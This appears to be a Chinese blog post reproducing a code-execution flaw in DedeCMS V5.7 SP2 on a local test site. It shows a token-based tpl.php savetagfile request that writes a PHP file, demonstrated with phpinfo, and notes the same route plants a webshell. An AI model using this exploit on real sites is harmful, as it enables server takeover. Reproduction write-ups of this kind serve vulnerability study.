dedecms v5.7 sp2代码执行漏洞复现

  • 内容
  • 相关

环境搭建

DeDeCMS官网:http://www.dedecms.com

网站源码版本:DedeCMS V5.7 SP2正式版

程序源码下载:http://www.dedecms.com/products/dedecms/downloads/

默认后台地址:http://127.0.0.1/dede

默认账号密码:admin admin

演示

本地搭建织梦站点

dedecms v5.7 sp2代码执行漏洞复现

域名后面加上个/dede访问后台,

默认帐号密码admin登录

http://localhost:8080/DedeCMS/uploads/dede/

dedecms v5.7 sp2代码执行漏洞复现

DedeCMS V5.7 SP2版本中tpl.php存在代码执行,利用这个漏洞在增加新的标签中上传木马 获取Webshell

我们先获取token,访问/dede/tpl.php?action=upload

在该页面中查看源代码获取到token值

dedecms v5.7 sp2代码执行漏洞复现

访问

http://localhost:8080/DedeCMS/uploads/dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=55ab8c3e67797476fac5a53259f700b6【URL地址+token值自行更换】

dedecms v5.7 sp2代码执行漏洞复现

然后访问 /include/taglib/secquan.lib.php读取得到phpinfo

http://localhost:8080/DedeCMS/uploads/include/taglib/secquan.lib.php

dedecms v5.7 sp2代码执行漏洞复现

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:dedecms v5.7 sp2代码执行漏洞复现 - http://www.shungg.cn/post/213

发表评论

电子邮件地址不会被公开。 必填项已用*标注